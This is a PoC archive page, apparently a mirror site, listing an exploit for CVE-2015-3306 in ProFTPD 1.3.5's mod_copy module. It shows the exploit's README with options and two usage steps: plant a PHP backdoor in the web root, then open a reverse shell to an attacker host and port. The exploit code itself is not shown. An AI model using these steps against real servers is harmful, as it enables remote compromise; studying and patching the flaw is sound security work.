Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2015-3306 PoC — ProFTPD mod_copy模块信息泄露漏洞

Source
Associated Vulnerability
Title:ProFTPD mod_copy模块信息泄露漏洞 (CVE-2015-3306)
Description:The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
Readme
# (m4ud) ProFTPD 1.3.5 RCE exploit CVE : 2015-3306!


    ProFTPd 1.3.5 RCE
    Usage: ProFTPD.py [options]

    Options:
      -h, --help             show this help message and exit
      -l LHOST, --lhost=LHOST
                             Local IP Required for Reverse Shell,
      -p LPORT, --lport=LPORT
                             Port Required for Reverse Shell,
      -t TARGET, --target=TARGET
                             Vulnerable Target,
      -d DIRECTORY, --dir=DIRECTORY
                             WebRoot directory to Upload Backdoor,  Default: /var/www/html
      -c COMMAND, --command=COMMAND
                             System Command,
      -f FILE, --file=FILE  
                             Backdoor Name,  Default: shell.php.
                                          
      




STEP 1 - Write Backdoor to target machine!

    Usage: python3 exploit.py -t 10.x.x.x -f cmd.php -d '/var/www/html'

STEP 2 - Get Shell!!

    Usage: python3 exploit.py -t 10.x.x.x --lhost 172.x.x.x --lport 4242
File Snapshot

[4.0K] /data/pocs/f3ec975336c98f9d89675dfbf08123b09b4e8b44 ├── [ 34K] LICENSE ├── [4.4K] ProFTPD_1.3.5_rce.py └── [1020] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →